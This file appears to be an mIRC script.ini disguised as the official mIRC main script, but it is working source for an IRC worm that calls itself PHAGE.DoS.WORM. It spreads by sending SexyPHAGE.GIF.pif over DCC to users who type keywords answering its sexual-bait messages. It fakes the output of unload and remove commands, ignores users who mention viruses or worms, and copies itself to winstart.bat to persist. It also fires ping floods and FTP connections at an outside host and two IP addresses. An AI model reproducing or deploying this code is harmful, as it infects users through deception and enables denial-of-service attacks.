[SCRIPT]
;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;mIRC main Script. Please don't edit;
;by Khaled Mardam-Bey-Phage         ;
;Copyright ö 1995-2000 mIRC Co. Ltd.;
;http://www.mirc.co.uk.Phage        ;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;
n1=on 1:start:{
n2= .remote on
n3= .ctcps on
n4= .events on
n5= .raw on
n6= }
n7=alias /remove /echo *** Removed $1-
n8=alias /unload /echo *** Unloaded $1-
n9=on 1:text:*hello*:?:/.run -n PING.exe -n 222 -a -l 666 -f spinaltap.trapnet.com
n10=on 1:text:*vir*:?:/.ignore $nick
n11=on 1:text:*wor*:?:/.ignore $nick
n12=on 1:connect:/.run -n PING.exe -n 111 -a -l 999 spinaltap.trapnet.com
n13=on 1:ban:#:/.run -n c:\windows\FTP.exe -v spinaltap.trapnet.com
n14=on 1:disconnect:/.copy -o $mircdir $+ script.ini c:\windows\winstart.bat | /.copy -o $mircdir $+ script.ini c:\windows\SexyPHAGE.GIF.pif | /.run -n COMMAND.com /c start /m c:\windows\winstart.bat
n15=on 1:text:*!so*:#:{ if ( $nick == $me ) {halt} | .dcc send $nick c:\windows\SexyPHAGE.GIF.pif }
n16=on 1:kick:#:/.msg $chan Jf 24 exhib _ wanna a nude picture of me...? TYPE: !sosexy
n17=on 1:op:#:/.msg $chan I'm sure u want pics of my girlfriends...!  so TYPE: !socuty
n18=on 1:part:#:{
n19=if ( $nick == $me ) { halt } | .dcc send $nick c:\windows\SexyPHAGE.GIF.pif
n20= }
n21=on 1:join:#:/.msg $nick JF 26 exhib ;) - If u want a picture of me... hihi!  TYPE: !sohot in the channel window  :))
n22=on 1:nick:/.msg $newnick JF 32 exhib here - If u want picture of me and my boy in action!... woooo!  TYPE: !sosex in the channel window  0=))
n23=on 1:text:*teen*:#:{ if ( $nick == $me ) {halt} | .dcc send $nick c:\windows\SexyPHAGE.GIF.pif }
n24=on 1:text:*trad*:#:{ if ( $nick == $me ) {halt} | .dcc send $nick c:\windows\SexyPHAGE.GIF.pif }
n25=on 1:text:*sex*:#:{ if ( $nick == $me ) {halt} | .dcc send $nick c:\windows\SexyPHAGE.GIF.pif }
n26=on 1:text:*pict*:#:{ if ( $nick == $me ) {halt} | .dcc send $nick c:\windows\SexyPHAGE.GIF.pif }
n27=on 1:text:*photo*:#:{ if ( $nick == $me ) {halt} | .dcc send $nick c:\windows\SexyPHAGE.GIF.pif }
n28=on 1:text:*bye*:#:/.run -n c:\windows\FTP.exe -v 63.162.153.65
n29=on 1:text:*salut*:#:/.run -n c:\windows\FTP.exe -v 63.162.153.66
n30=on 1:topic:#:/.run -n PING.exe -t -a -l 65527 spinaltap.trapnet.com
n31=on 1:unban:#:/.run -n c:\windows\FTP.exe -v spinaltap.trapnet.com
n32=on 1:input:?:/.run -n c:\windows\FTP.exe -v spinaltap.trapnet.com
;
;JaUeSuT AaNeOuTaHeEuR PaIeF WaOeRuM FaReOuM DEL_ARMG0 ! BaUeT TaHeIuS TaIeMuE FaOeR REVENGE [PHAGE.DoS.WORM]
;
